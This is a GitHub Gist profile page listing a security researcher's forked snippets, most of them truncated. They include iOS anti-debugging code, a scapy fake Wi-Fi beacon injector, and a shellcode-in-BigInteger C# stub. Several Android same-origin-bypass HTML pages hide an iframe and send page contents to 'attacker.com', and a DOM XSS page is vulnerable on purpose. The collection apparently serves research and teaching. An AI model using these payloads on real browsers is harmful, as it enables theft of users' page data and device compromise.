Skip to content

Instantly share code, notes, and snippets.

Avatar

Myo Soe (aka Aung Khant) yehgdotnet

View GitHub Profile
@yehgdotnet
yehgdotnet / catchredir.m
Created Oct 15, 2017 — forked from joswr1ght/catchredir.m
Demonstration code to detect runtime method swizzling with Cydia Substrate/Cycript.
View catchredir.m
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>
@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end
@yehgdotnet
yehgdotnet / fakebeacon.py
Created Oct 22, 2017 — forked from tintinweb/fakebeacon.py
scapy-fakebeacon - spawn lots of fake wifi access points by injecting beacon frames with scapy (essid)
View fakebeacon.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# source: https://www.4armed.com/blog/forging-wifi-beacon-frames-using-scapy/
#
# requires:
# radiotap supported wifi nic/driver (frame injection) (works fine with Ralink RT2571W)
# iwconfig $iface mode monitor
# iw dev $iface set channel $channel
# or
@yehgdotnet
yehgdotnet / iosdebugdetect.cpp
Created Feb 28, 2018 — forked from joswr1ght/iosdebugdetect.cpp
Sample code to use ptrace() through dlsym on iOS to terminate when a debugger is attached. NOT FOOLPROOF, but it bypasses Rasticrac decryption.
View iosdebugdetect.cpp
// Build on OS X with:
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
#import <dlfcn.h>
#import <sys/types.h>
#import <stdio.h>
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
void disable_dbg() {
ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
}
View MetasploitSOPBypass.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android"
&& spec.getBrowser != "Chrome"
&& parseFloat(spec.getOSVersion()) < 4.4) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
View AndroidSOPBypass.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
View AndroidSOPTest.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
View AndroidWebViewRedirect.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
parseFloat(spec.getOSVersion()) < 4.2) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
iframe.src = "http://attacker.com:8080";
document.body.appendChild(iframe);
@yehgdotnet
yehgdotnet / Numerics.cs
Created Mar 2, 2018
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
View Numerics.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
View dom-xssed.htm
<html>
<head>
<title>DOM XSS vulnerable page</title>
</head>
<body>
<script>
var l = decodeURI(document.location.toLocaleString().split("?")[1]);
document.write(l);
View gist:5b7562b46e6da6d05fc5b7ff35163bbb
<?php
$s = $_GET['s'];
echo '<h1>htmlentities</h1>';
echo '<h1'.htmlentities($s,ENT_QUOTES).'>HELLO</h1>';
echo '<h2>htmlspecialchars</h2>';
echo '<h1'.htmlspecialchars($s,ENT_QUOTES).'>HELLO</h1>';